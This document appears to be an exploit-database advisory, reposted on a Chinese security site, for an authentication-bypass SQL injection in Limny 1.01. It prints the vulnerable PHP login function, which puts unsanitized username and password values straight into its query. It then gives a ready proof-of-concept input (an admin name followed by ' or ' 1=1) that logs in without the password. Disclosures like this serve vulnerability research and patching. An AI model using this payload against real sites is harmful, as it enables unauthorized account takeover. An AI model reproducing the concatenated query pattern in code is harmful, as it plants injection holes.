########################################################################################### [+] Limny 1.01 (Auth Bypass) SQL Injection Vulnerability [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ############################################################################################ [+] Script Homepage : http://www.limny-project.com/ [+] SQL Injection Vulnerability - Notes : magic_quotes_gpc = off - Vulnerable code in includes/functions.php -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- function CheckLogin($username, $password) { global $db; $query = $db->query("SELECT user, pass FROM ".TABLE_PREFIX."users WHERE user='$username' AND pass='$password'"); if($check = $db->fetch_array($query)) { return true; }else{ return false; } } -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC Username : [REAL-ADMIN-NAME] ' or ' 1=1 Password : anything [REAL-ADMIN-NAME] = usually is admin ############################################################################################ # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论